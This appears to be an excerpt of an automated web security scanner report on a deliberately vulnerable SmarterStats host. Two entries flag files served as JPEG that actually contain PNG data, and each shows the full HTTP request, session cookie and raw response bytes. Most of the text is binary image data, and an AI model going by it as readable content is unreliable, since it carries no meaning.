B........s.P+.XJ..fi..v0    ..!]G.&.:L..B..w../7..oi.k3.....<...ZA.R..6K....G ..Z..m.........do....I...Wp<x...A.R..6K....G@...!..Z..!......m..u.c....c....>x...A.R..6K....E@.k.w...".}TZ."..    .A.}@.1s.........G._..`.6..........`...$_2.lw}.j...C6c0.W.h3.=.....`=#...l....L.k...g...].3C1....t.^.I....|9....<J(...@... .3...K.I.u./O=/.....`..>.f...>.Q6N?...A..('.`.+@.g.....V..._.f.Z.....k.......f..u[..9.o0.+.....#..!`7.......>..........q.!.3C1.$..h......M.l.....<Z(..v.@....x.3...r....._.`..>.:..OQ....J..+}.-....     ..n....n6......P...:... .}....7.\$%g/.8b(..v.@....x.#...?6SM.\..t....w1....xM..ig4.... .....?.)...e.Vi>"v.y].....;b..........e.0.Xn...#........'..k7....z..#.0....hBf7.....g..(:i...{..D....x............o.~....R..<.d...K2...{..=.|".`.    <..M....rWN...t:.........../.~......../.C.'..6..S...twh......u.....p.....^.E.-j.....#.`..=%[J`_..i...u:....D...`..>...nS......dv.!KG/nC.?..6..S......+M..p=....}.. .}....Q_.lz............-..)..$s...|8.`.4....`M{..8%v.T..g.....t.....G...>.................)*.....^.........O...~..h1..........c0Hs.x_.....P4..M.........H?..[..S.....?(M.m..B...}..c0....t.[....|yt.f.G2.C ...l.gN........b.... .!....>..d....TY...u.. .|CO.6.....|4....ya..ov.a0...t.\.*...^.m.........!...../.).F.^7.t.|Ht.7.....[.M?o.o.....q(.3.|!.`..;..H.....&."......6........@....._d...:.].+z./....b0...t.....(..".h....@.....f.    x9.]3.k....}..A...Y.@sA...!.`K.gJ..s......CT.}c0...t..{c...N3>uN<.....C..........C....M.......S....=.C7.pA...'.`K=cJ..C...g9.0.L.1....9b0...x.l7.\$%g/2.!..4.@...2E@@.Ui.*.............n}U?.LQ.m.H...[.XS...>...4....`;"...`.w.x`.Q...t.&.....#..!.>......$.    h.QM4........ ../..n..MrWq....6\O#..[.aS...f........l&...oc0.B..V..`....h....@ ...l.gL    .....J.!;\...........l<. .,...`....(./Isu
J3.c0.B..2%.|.^.2akDG-nA X..l.j.j.Q.^.........@.....nk.5..&.....RO...z....g.......D.!V.$..l<. .(...@5...*.....$u*
...}.KZ....J..+.:l....".`.TsP....$.L"R.%...A....m..b.e`Rvh..X...<i...D.....`.@...=.MD    x.l....%.@#>..:E..........u....../.....-.....-X.Am"J..`+.jG...4..I2..-......wcI` +.K,...[.`.Et.....E......6.%.I..qL.z.8.'..&.p..oH...EV..%.A..bM...9.p\...Z..@.. .....&..4W.....K.A#..6b..........$.=....VX2..t.l.g.R.Om..Q.[.....[....D.@..].1l.....sc...I..o.t.9T.,.WJ.P....L..M...r...{$.... .,...`....(.= [w.....5l..=..0h?.#i.m...."..^,U.<D..l.}`.V     ...,T*j..o?"M.lr.l..;.X..~g...yW.?7^..j/...N.R...`;6.*9.1;j.. .H...@6.......K.I.u.G. .j.k.......P.d..Ko.'...b)f ...=..'...l!o@.......H......co.....m'...jSe...I..#...0..k.>.}..~oz8.!..@.     .B..T?..J.^..z.r.l..i...`..`3,*s..ooDJ;,m..s.p......Z..,    . ....9..[........//.....
6..}b>....r..V..G)]..K7.3...CT?/...|u|8.!..@.     .B..T?<..|r.'.....b.....{..;..vM._J.u..`..l.0...vg.......3..).BL........"pK...~......&..S.?....wL2...V.byg...o.4U..`.vqS...G......!&.`.q.Q.p.xt.fi1*?.`.......u.iZYn.qC.5.......S#\.......Cm.O....6.......}.={.k.6.l]..a..=.w8............9..E...t.|..$/.....B...............Z.ul:%......s?+...r?....E6........bM?/.{..|w<C...H...[.@S........t.....5...'..V[2..".....`.......W.....l.@ M..li.M1.P.W?=K:..,f....T.}.I.....7I........t..X...5.~y.....B..+f`C..i".`K.h....h.g...X..S...'%j......V..Sd.o..2..C....d.K.......H...F.....9.$c.....*..-.../m.jn...{.#".....&.>....8....k......H...F.....y....y....,.<......&..J.[m.|.J...X.........r..c..2.!..4.@...6EA.../.-/.u.l..ul=..
.=8...[-w..f..cX...S......W..Ow0.!..4.@...6EA@    x9.@.....S.4..mY.[..<.jO`aa..H*]..;._....a@C..i$.`K#l.....1m.....k.......v2T..........u.K..*XX.<.i.......S[3.!..4.@...8.A`...i...`..Y..s..P........,.Z.."[....@s..h.j$...... ...N..........o.
.G...^+O..t.]...jg.....Oaad....XSAw`....S...`\..?..l.p.T.    ...FZ..........&z.T{....j..(.[.....F.=...........|..>..!.`..;.ZN`......m..M.Gi...Y/#"..+...k.Y.....f...y....92......!.....?.).r.^.{.n.....e..}.w:..^./.u.y..,.....4.Z..S.pd.....!.....?.)..rc.....b.([w.&#s..@.#....V..Z.)..,...[..C.6...].T............ .|.O...:-.........i:-.j.Ni..x9...U{.+....q:.....dY7... .....O.).....$.w...a{..c..D........:^.[-.U..I..sX...j.S.C.. .'.....\.@.'..6..S,....c7K.Q...........t.
....9....nD.....1...r..C/..U....A....H...#|..@^.qi.o..`...*...M.iD........9...U{.;.A....'.vt...D^..........G...%.u........[..%rs.7....";..E....{.k.....G............l>..h.(.....6Q.~..H..Y.....[.[m.3Rj.
.].^.k..4..q.........l>7..C.............L....'.r..zM.l0);v..".@..W/k..;.._%..V3P!...     .|n........@.l.6...I...(vr....)...f......#....y...k.1H!....@.........|.Q6=l}....6].w....j..<o..K...NW7.V.9.5.M.....[p...XN.k.Mw....`#....K+r..K.zI..*.%....I..]......#.`.\.P![    ..e....do.K.6.....e...L4;@wgb61...'.............G..@.. ...$T.f.^.lz..Ni........{HYn.3..z...0.....U.<    6...)..A%.`.j.P/+    ..e.3F.nV..n.-..,.....tw.f!....'.....q?.....r..4..J......^....e...V.....R...i.    .K...e..."{.`62....X#.f.....N......z...'..S.*.r.....(.;_..j9.....P....`m;.....k.....<<.@.     ...@T.N..D..ZxB.o.K5{....j.F...{.a63..~.........p.@......e...._..H:....`x...\}ZFl..g.Myn.C.L....1.....de.O....7..!W...
-.m...p.@..........,....<    ...=.=....2.I.W...w...7....N..n.I..F...o..+M.d..@ ...l.l.*..2.....V........Nn...LTm.@..R..A.b...<q .|......5......Mn..H:...N..l.&.[m...{..n~...A....=.Y.q.....\....[.....H`...$c....[.ifc..V........"......{...5.k.f.J.&.i...g.....-T.Eem%Psj....&..$.=..5J..\...?....F.=...b..K3.@......m.Z....@........J.^.F..:.F3....=....b..[....0;D..b.0.o.....[s.BG\#....yh.;.BC...........l...3.%7.)o...u0..CE......z..F..X;9.F)Yf... ..P.@.....$...l..$.g5..b........E...=..O.X...[.p.-..w.0. ....@.....&....`.F.(_.k.....i)=0..(.1.."...n.g    ..I....v...............%-[...`$.5..v....E]Q.Ur..z.G..C ...l.l7jm9.........=N..h.39..`.".`.....\...p..[........'..[8..ZC@..X GF]..K..u*=0....X.....qL.:....Z.&......BJ........P.GW....~...{.C"..D>.....&F.S........O....6...    h.D.'q..7>lD.
.qX..ly2.v6....[.`....._.|..>..M........p^..B..s<..t]G3-:JJ.`...............Y.D
G..I.<' ......4".@@w.:/f...G....&..0...cAe...8..V.;U.s.|}......D...-.....P...-..m&
#z...."....1.....
m.8Lw...b.M....D...-.....p.8.m.M.%....f}T..2.........,..q.5.....#.#.....D...-b.;..5m    .6......O.0......{"n.V9j"k$..9....@.E.M....F..E..V"{...6.K7..9f
.cBb..``..1.....$.`.f....*E[.)?*.......R..)X:....+.IH...a.t....>..K......3.8.....,.........OJ..*.ES.T1.....L.}..t...u...\..@t     ....x......}......<.."...V$.=4].K..]#.=.S..
o...#n$).c....@.Y......m.s...1?......M.....4.$)=4....g...6    G.T...x.s6..-.. .}.....1.B....}...........SW....YF....d ...J.[..?.f......./..!.... .,jl\....t.X...V...U."<..~..$GJ......PK0UGU.......R...Mg...,#.`...q..J@..... .....M..4..n.{.#.j.m..4.    .+U.....n..1....!..K     .,mx....8.s.....~S.*......]/......m..)....E0......Q.J....Wc.B.b..6....!..4w......i.p.\b.<Sv.....X.4...L..SR.....s.J.......tV.@.r..6.;..C@    h.6."-.zeb..V.....=&....h..)5.-r.~..`..=.4..B...M.....p\cg.!.. ....}....$p...r........N.%.l....=^...O&    ...
..y..<......j...A?.s.K......*     ......e.N..,.^.BNN.>..."......^"z.y....N.j..-O...&I...L....~.....'.. .....l...@.V.*.J.u...W....L.R!.j...%..R..[...".g.|.._+."..Luj.R$.*D.NjB.....Y..E.@.N..6:.. .....*.x...~.|..IJ.K5#V..L.k..R.Q......P.0.V`.......R..%).....
..q?7....Mh....@ .........D.|.j.t.....Ft...(I.wt...r.l..Fp...4RV.w.....K.g*z?1.U..|g..:<.>.... .....@\....u..
....i..M..%..-W...]......P....e.@..F....."....rdv'...Grb.u..U..(W..+..i4R..U....... ....["... PI../.........9S}...j}.M.i*bu..F#u:.....@}. ..C..B.....|R.....S'...I..m.B"..d.F....r...F.T........$...-Y$... PI@..~...#\4....k.{..........K........-..........@.     ..M..A.....Y..6.tNP..n:m...n).sz...qW9..w_h .....1....\N.C...H...[..rc.@.&.]......mw.?;.e..Q..y..=M........_#E9?../..s......"i'../%.....@...".`K.Y.....$.').y.*~T....#G.i.......`_.k.6...L.7U@:...G.t...5...#..L..Bt_...8. ....@...-7....%."N....:.Y....:..9.T@.....T....4:W.*.j*...].a..V.........a..No..T!..Z4.l*.. .......-.T.'. .T...M..N=...0........KM.^...4l.......~..........^..@... .`K.U.    ..XG@s...u.u~.0. ......p...@ ..t:w....#."....... .."O...@...N.;..o...C..@J. .R...B..6..X#g..........-.|.;. `..M.|`...y....@.. ..E.r ..+..~..D..qA...H&..[2ir/.@.z.... g..Z.....@r     .....A....P...-...92.m[.s.....{..8!{z6.U....?...R@............&........j+..wT.....-..l.h;.    ...@... .... P..n<....j...Y....mk ..V.%.....U&rv.gN%w........[...f...N9.........z......;B.^..6{...!....8...s.jJ.G..pR!.....M.B...*.r."L.^.5}.....gF..}.L.U....U.o)...B.z..6.... ..d..3J5.n..G U..:J..v....[....r......sDb.ut...Z....y...K     .,mx....RG.....]....B...L.]&.~.E..UL{fWD...[e...........W.gNy5....,w.....l..=.C..a%P.`+[kV9}...[`..j..8v...3Q...@.....'. ..
..    ..+....q..a.m.Z]k...........z:.
..H6..[..r?.@...&P..h...U..lJ.)...^w..0.Zs*...T7:.............. .......-.MD.!...@................ .......-.MD.!...@..............$..2..Tl;.<.~.:....m....s.m.,.\>.U.;^..H.T
.......^.....@.0.Q..Yu.97/.ln......0..[....A.n.;$.A[..d...G.j...s.J......U~GW.Y.....}...=. .`....7.U....jF....U>    Z.tg}.n;p.....K......b...T..-[.V...Z..,.V.Y..:....}.C....(..[@..jA..J@EZ..../.lP.........t....}.C....(..[@..jA..e.t.T..U.[...M.u.s..}.C....(..[@..jA......Z.dUD.j.............@@     ...0T....Tf..5'.ZU(."fe..*.Dk_.V...eZ......@ ...l.m.....@......*. ....... ...@ ...l.o ....@.......l...@...... .p....7..... ...@...6... ...@....8..[....A...... ....}...... .......-.D. ...@.......MhZ...    .....IEND.B`.

10.32. http://vulnerable.smarterstats.6.0.host:9999/Temp/869b700a3e8b4973a5fdd0981173fbce.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/869b700a3e8b4973a5fdd0981173fbce.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/869b700a3e8b4973a5fdd0981173fbce.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:18 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BE11F5300"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...^IDATx^..Y.5IQ.....TD....E.'D.#"...8 ....y...l;...p......>.b7*t..]...Pf..Y.j..<.U..5..[+.......Q.OEFfE=..., ....[....K., ....@.I ....[@ Z....d.Y@ ....d..- .-~.t..., .i..............Y@...4.d.Y`q..D...]., ...D......n..<..n.nN.....U+...t.e.Y`..X    .....,# zt.\..E..........h..P...X..b$d0:...4.7..,..GA...wT...6h...(Z.>.:...A...-.....6O=.T+O?.t.../Kd.....x..W.Q.^......i3@. .[.`..c.c....=......7el..Q?!....'.].    D~h.2..jg..;....r.V...../...j[......T.....    6U;S..Q..o......].......@ .....d.o. ..v....S&.T.L]lG...i..H....m..V....z.....].p`...<s,;w|.........=....    Ds,~..)7`..=....<.g...."..Ds.2.[ED~Fe.......V.;>.........n.\.........go..A."...Z.V *4TA3&.<t.5...>...B..@T...M..Z...{...j<t...s...D?.......r.......vSn@A..&{..16T.e....._...2w|S..@4...5s....)...b......B.@...Z.......W....G...^..O..!d....;ED..Q.n.(.VK..F.=..%.. ...    ...""?.2A....j..\...:@.!.....................Z.).>.].Pk..x.;..O..!..At.f..`~[..X...f.".....z...j<t.A.<.......".
.\..8mOE.U......Z
...8[.9.3..<.d.~"..!.
.8=......W6.^......    ........1s(.........".%?'t..G    ....D.9H....P(...'$.... ...".X.s..........h..:.MK3-.J'9*.......L....!D.Q?"....D..,.fu.Sz.c..<t..(9.....5.h..B.....nN[..-.S.|m.k.........W........AT2...(Y]o../<..........""..%...    .B.@T:K+.    D..z....J..C.*....../..t&...@.w#<.Pz5..Py.,.H.~.5..?...ED.....@Ta..FD..
.....1].. B.@..3]O...Q=.......Z.."".._.Q.LZI;...Fx...j<t-.".+.6..... ...t.V...*....."......iU!Vt...a.=...M:....G.PsL}..P    ...P.\...>."".("...... B|.w....{8k...fL}..Py...X.\.5|...D..;7..;ED.x...5~.....).y,j@.Qr b.ra....B...j...m="".....l6...6.".+..Q!...L ....p(...]....G.ED.W...~.._......{..Y....Fu...vSnx..~{.>.].<.Z@...D..p....?..Z.x.........p...L}..P....X.......>/.D....
....jV'.>.Q.K3...5P`.l...
".+.......!r. ./.......h7.Y...F...V}.cC.Qr...CN.[..    D53....Tl.6uI...Z...U...<#.=......<t../9.....5|.o_...FD...@.Y<.n
..Q..9..b........l..(,_.%....1[~o..B<.f.....h.,...    -.4c.?T{......M..,]fK..%...N:.5 d}*"J......$......0......@...SW...CD.-9..N:.5|... "..}.l-............q..,]...y....{...r. .]....HV..D...6.Y.".........S.f..Y..Q.[.Zy..]n..5..l..g.. .@...%.".!.....7/4.....S...D............. ....h..|..5|w..B..2.T......~....Q....Mp..86..%.".i.TD....).U!....A.|..&...&SW...CD.-9.y..Y)...._h."........X...#...u`sl9......G....Kg.....).U!.....P.eS.zX.JtV..M..,]ql..K.D.]:...
.@.@T...V[..;j`...    ...A....yK.D.;t._ji.....!.Q.b..{..ul...D}.sR6.Y.:...(9....v..Y..Q.[.Zy..ul?:...4Q...;KW..s.b....{.4.".U!....A...X.6m..t-."..C..{.2.. .Q.[.Zy..ul..PH_...X.6m..t..!./...+9n....!..DU.)k.."..}6..>..M..,]ql....O ..!.....7..o.G.......+.E.U...^......r.....R b..2Ge..@D\.....v.......l0"...J....$.;t.\@\s{}..,J..O......>;B...k,[).a..cc.]Pg{R....".l.D7.....h../.]7.!.Z.B#.6p.....X.6m.,]...w..!d. ./...h.n.o.y,..@.
...>...Ut.c...y..F....W.t..>.9..:.,]..l.Z..l.J....]...!f....k...9.Z....%a......l|..?..:'e...+...ti...g{RK.o. B..#.a..^.....}-..h.s....K3.!..D.}....rKA.......hK....w..!dC ._f.eSB.Ds5..?H.._.x>.D.....E@.X....J..5.......!.ua...'...q...=..l|.......I..g..cc.]P..SK.o..B..A41.!..c..uH....u<.&8KW..s..L.....B@.....bn(.D;l./...D.e$..\x..eR./..YU.....q.b6f%.M.;.........K.~...KI........8KW.."j.A....k..."..D.|)n.."v)    ..J.....,].D.....dADJ..Dg.@.kVL.LC......].M0v...tq*.......|......k.......#"..f..
}x..uH-:..YY..l..tE[2....:.lO
..Q....F.w..."...lge.O0.b.Z
D.....[BD..FD.w..`......E.......[N..'.5.tE["...-. ...".l.D...v...w...[.......c...,]ql........7..!D . ..D..!.....a.
..g.Z
D.......D......@#.D.sK,8,."f...ROEDo...".l.D.....GD......g.!F..    6.Y.... b...... .....#...........'..g..ccF...=....!.sC ....*'...U{lK.......g.a.!.c.
..g.Z
D......... .!.E......p...Y[w..........d.`...w....S..+..5.v<YKA.(...kU_.......jS..~.
......4I..tE.!.....m!"B..#.1*.e..2 ....X<..4+.Y.]<.Qn.nv..;..;jWp..;KW,...Q...rRc.|.....$57k
...j......[..?O....f.!...o..d5.lH|...5.K....    ...m...P;Y............#.Z.%.`.g.B.j...kK6:..YY..6.Y.:.."...Y9)..[....!..v..E.O.Q..~"..... b;+...Mp..."f..J ."..>.@....v.8.}........Y[..y...X.x..,].........B.@4.W..yDD.-..<lg..`h....,].........2]_.....H j.....d....+...1..XK..D..O..D+..jK6..D..H.c.a    .1#.6..6..!..JA..    .Oq...>V2.&8KW.."j..hd%....&..!..@......J...X."........lAt.@...h. B..M-....J...g.. bF...r*....B...V
".NHt.....-.".....)..%..!..JA..    Y
D.d.Mp..hK6.XKA..[. .. ..@......J...X."....*.....*@.!..JA..    ...vVV..&8KW."b.`.cE`...!.S Z).X;!.y............g..+..B.....}(....>TM...i...+......Mji..."..D    ../..J.._ze% .`..X.x..,]..tH    Dc j.........zH..../..A.vV...6.Y."....*o......>. D ...#hn.E........W.pVV.......(8...%.#b-......>..3.u.9Vg..Q...J/yDD..dt....r`6.Y..-......)@.!.Q.&....2...w.|.Y.T.v.......c..Y.b.|..R.D-..l... .....P.X..}'........    ...i.<..K3..U..(g..8S.SW..P...%
|c;._. ..ED)6.".%jV...._.d..l..tE.1....I%..c.>.......1J...c.....+......b..    .....X9..........|Wwmo. B..S.=.YYKO...."........]....."...D........,0Dge-=..l...b..Z.! d}
D+..+...C..Zz..g..cC8k.!...........@.R....l0..-."..
DyG....?.....H..G.....``..X...Y..-. bE`f.7....QD.E.^?. b..;..sR..'s{;..a..-....>../     B.@.R.....yX`..XKO..,]qlLGE.mR.j...O.H j'.{)...........././.....sB........Oq.R...&8KW......[r b........"...D.u.R b-=m..tE[2....IED..Y...JA.
..:....l..t-.".R.l.E...D......M............S.[....%.Ys..QJ.._.@...h. b...:..Zz2w..-...F)ai.-.....]Z..c..P....=.x>+.^....`\.yX....`.....~...!..z..|..-.,..@.|V.....V..L.F[2......L.bl..@...N_.X.B.w.m............5.......%g.....[R....b.Q
D.... b..g=.../..jkI...K..fA.X..@.....B..1..b.?'4."...(..
...5......|g....Q...%
|c.D...4..x~.Fg..Zbi.X..i......
3...K.....K.]...h D....j.y....&&...:...QO..K^.Y.s.._r...C. b:...
._ ..@.........P......{6....K.j.'..0.........B...........XO...g....&8KW.%.Q[.."......).............(..K..k.cyK..C.!....W..."........X...v...t.@DtT..7.....>'.!.Q1^..n.D.....`.. b:.90K..zM..B..r......3.E.....`G.LG....?... .Q1^..z....[*...m.t!/.>;8.......]...b.Q9_.[z.h.OU....1..!.5.".>..W.."D *.KyC...&Wt.6.X.Py.......C*Y.._
..@T....[...|,}..D.D....[..#....{\.?.../.=@.|.0..1.cEK...k..@T..U....{2......yr`x./~.........YRK3.q........"..e.....#"...Vk..].g.."D Z)..7.&..I...a..}.X..".,j.d.}..\1B..>... ............]...b..J..@.|._.....r......Q..........-r.?......Yk.g...[n|...6.2........K...kV?......?..4.Hs..'.....A....]...2u.u.Y....{w..6..{.....y.....j..e..g}{.....@T[<.Y.cY@..X`s..Y.f..bE)..d.Y..$.f.X?..d..Y@ Z.-.....g......F,.......n..H..<..D......7w%..Oc_.6.J......=..n...7a:'".UX..X......a?.#{?n....o.c. ...R.6EM.."3.F).....Ms...J..G..u.....Y...f.w..+..5...Rk.`FC...n..
.....=....m.3%"...=.....{...LE;...X.WIz JM.     ...=....]..@...c...LU3...\%..#.......-.Q....}...LE;...X.'X.K..U.[.M.\m..Pr|...<..d.v.]...7...Muh8..=...n.%.c.(&....Y...v    s.n&.[.D..T_..,0....$..G..,.i......K...&Y@ .d6.H...<- .M.f.8[?.;~.d.....u;t..........._o)....F....>.dL_............@....z.......H..DS.....9N.N...1..../..^..V..E..$...8.........k..Rw......O.....
a...........M'}3....M0d.....D&..~..wt...k......W.H]ERWp..S...u....n4.....?8[.....J..0..].D.L....bh..H9}..%.o..`R_.../.....EJ.....1..^ ..+.[....n.....v..ZgO....,...HD4...|.O.A .`..@t........`..=.Dm.&.3..;../...2.GW    ....M.(90..l.....S.2..1..f.....    V,s....p.K..(.!.R:..[..F-]Jx....P...)Z ..<E$~zK..7p...xK.h...O.!x...........cD..v....FD...l...e....,;...du..."............o....,.".\...u..    ..."F[}....s.l.;u..{']1*...W.u>.R......+....7...?..<..>d.Y`....Y...e.Y........., ....@4.|.., .xX@ ......d.Y...f.O?..d....D.VT...,0....,.....,.a......C...fY@ .e>.X...<, .yXQ}....,..D...........".+..Y@..e...o.Q..S.@....IEND.B`.

10.33. http://vulnerable.smarterstats.6.0.host:9999/Temp/87c52fec79874f5a9f7278d96f4dc7f9.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/87c52fec79874f5a9f7278d96f4dc7f9.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/87c52fec79874f5a9f7278d96f4dc7f9.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:34 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEAA8BB00"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d..!.IDATx^.].......bcc...1`.ec..\.[.s.f...........c..7....a!.+$..]qH..V+.....0...?.....W35.3.=..S]....Q......*...#........A.`..V...... .(!"1.A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@...............F....Zf.....M.6.l}8.^......A...JAD.0........jp....;. -_S~....^...TA@. .JAD.-.%.    U....$_ .h.e...w..A@.(.....".C>:..t.bH..p.DMGW...&...W../.ellL}...R.....6..._...\D...".A*.n...s.Hw..".A.(...(........!...(...!.n....f....m.,I>.qBD.(......!.,D..U.H.c.[.D.FD..E..iL..t......Q.+..{.N...BD}l.{.~.5k....i......."]6.i.$.n.....MZM!:u.:...Y...g.........BD.`(..S........y;u..1+..>C.....q.-&X...<.....YMBD..L.(D..Qg..RM.|.BD..$D..Qg!"6..IBD..L.(D..Qg.D...>S..pBj.C@.f}`."b......:D.}.....u......!"!"...-..S...O"z...."r.8...@.WG.N...>..._.B-.m7..HD$...P..
..C..'.-=.4.x.}X.#D$D.2...Bt..u.ID........2.!"!"...-..S...o"z...X.#D$D.2...Bt..u.ID.1."r.92X..Df.!:u.:."..|...1{...X. ..DD,C.[(D..Qg_D..|.....Od.......P..
..C....}:9..h..3X.#D$D.2...Bt..u.ED....D.v.<....    ...%o...:D.}...O=..h...Y.#D$D.2...Bt..u.ED..Y..h...Y.#D$D.2...Bt..u.ED...Tw.........{.(.....C....!.....j.UW..@""..X...P.N.....h..+.....6\y%.t....X...P.N......    ..P............U...!.....?.H.......q..DD.....e......3..\.vS.sp....`..#2.G.8",".8.U..:.4.u..
.j..}.$...c0.....rj    ..C..WDt.N;...:Jm..rN..q..6.p..O...=.-!".9.
..C....a........5C$3\......h7...V.c....$c.....>.\I.N...>..$...... ...;U.......^M..I.....60..[zU.....6^{-..T.......h.'......t.X._......u......u.^...uEB.)3.....)...f.....#2.u2~...BI)D..Qg.D45:.#...^.6_=..J..M..S..)...X..<...T..g3..Y...d..eCN.Bt..u.AD&.~..k.f...\. "...2..z3R.r7..!".N..Bt..u.ADHxED.....o..e....M.....</!.<...;D..Qg.D......]wU[..Nm..oXF.(...m`!!..!dW..S....".......h...Y6 D..&!".9.
..C............4u....X.!D$D.2...Bt..u.AD.....5.}....LG.H..e(y....!............4k......#]..1....S...."ZD.....k".~.-,...H""...-..S....".....y?C..o...Y.#D$D.2...Bt..u............NP3......Y.#D$D.2...Bt..u...L......D..id.........!..7....5t...m....Ho|...H""...-..S..s.D......}8...+...........!..7......q.6........&!D........!..7....ABBD..C.....jBt..u....y...wT3.i>.......2F..$!".9.
..C.9o"ZFI..v.E.\v..BD..C.....*Bt..u....y.w....    .l.....2k68P.j...C.9o"B..}{....6.(.$.~p...hp..5...!..7.=L+..R...K..e.o.2.YG$...P..
..C.9o"B.....$D..a$"r.f..Bt..u........=.0....u.&;4..DBD.c..!D..Q......_9.H!"..s...8(..    ..C.9O"2    .+.>Zm.."].....;.....rk...C.9O".....3{...C'":&h.}p"@.>|..s.....vwq....'Xwbh2..i..-.k.....f.].Y3...S^.D.bj....F.GKG.m..\"".9.
..C.9....5..Yg.i:...._..e.%!".    u.%.......>..hh...0.o.{.#..X6.D(D..Q.<..d.o...P...r.....QR...R7.P_NQ...w.....>.......@l ...../j..;.i......_..P.$"J ".J.....h...l    'I^""...&.bt...yFD+h...v....>........._...D...%.....%7...:D..$"$......F..Y.......4...z#"
...f....k.n............:D..$.'.=W.G..s...Z..}..:..d........s##Xw...^.._M...*...7.*Y...rCf.^.9.|/.5...h.!:u.:...........Q7..7)=s..%......N.....C.Q..?.U>.5k..E.i.h.)n..?.q.$!"78rj    ..C.9......~..".(28.......3,.....v    ..C.9/"2    ...~..|.y.....q..........s&..F9e....K.N...y..Ix}.... ..........^.8..k...C....9.n.!.6.&....NR.h.....].j..#".3....._....!.......u..Z..u'...M...a.x.....yu...!.......I...t.9....kY..1"2[vD.R....wJ.<K......5@.N...y..NxE.k......hnE>I.&D$D...!.6::..;.Q..>..l.....e..Xu./$D..    Ct..u.+".    ....6.k.)[...eD........un....dB "....).._...ZH.nc...%{.....5v.O..a.h.,.g..,.....%.?_}U.z......$.u.k$.>...j..gv..|#".]..@D..h.S^...........@NH.C.T.K.._k..m.....D..5.....q.|..h..g....9F...N.....>..r........>....6\Hx}...{|e...X.f.#.......t}7b....5A.Ho.....{......8........X......X.(...DDg4.+/...h..e..P..Nq.k.2. X7.k%....=.2s..,|%".....6....;..0XW.K.._+...?.....UG.%D...i":.........(...8G..._.`...$..M....2s......(-"b...4V...+o...z.B..y..Y.`.....MP..3.Uh...^.....}Oa.Q..8......X...#.G..'3._.j.7...Q.    ..... ..a...(z].8.?;...X#....BD9...h..SXe=.8........9../X7.^v..zM]..l..2V..,".!..9jIg.E...s..D...(..+L...9../X7.....%..q....w..Q.i. ..v..,.9.5".t/..f.:":.dvy..Cu.........'.s..^.n`..&t...^.|e......$....zOp....^...z.!.,{.....%..O<Q....E].......X/..O.....\ "c<.....VC]....SS...D"...)..d..u..u.s.C^.n`.<..~..X?.r.%..)IDT."....'..bCB.}.....m[.^."I......a.q..........5...S.e.V..a........|.]#.\.`..3{.r...dNDD..5FO...G..s.i...c.M.....m... ..+......`..3...8?.r....)u...F7.p.R......^.....{..F,+.=...:*.../X..RH..%......yfk...9DD|#....._<.$.h..gl.j...D.....8.?...v..:..4.O...#...M....!...mI.....o...}_............$?..D...4..|..8........`_...m.).u#...q%..4.c\.1"F.y. D.F3    ........u##X+...........Tl-...;.s............`......vK..../d5.DD}`.....=....g.L..e.N...F....g...."r`j...=6s.k&.....s8hxf.....M<....>2=>.M..R".DDY....z!m..m.|]......j ...Y:.5.G....#".D&...........BD...Y.`....K....#..\.BS"...h@"z.9{..=...dP!q.A..._u..yf.P.....n.%uDD+F.-.w.U-...>.......<.U....""ZIc.I>2=o..a..."".D....E.ao....;G..F..:....i.^K    .BD9Z."..tz...4..F.as.<#..;G...Su..6.......>.Y"..M.%......"..vp.k_..;.......Xc.-.s........%5..y..2F.S.M.h.oM'..........]E.....Iyf.|d......1..1..G..\..i..'........ffX.....sp0r%Su...T.<.~.....Xp...@D..^.iO,x.Q..
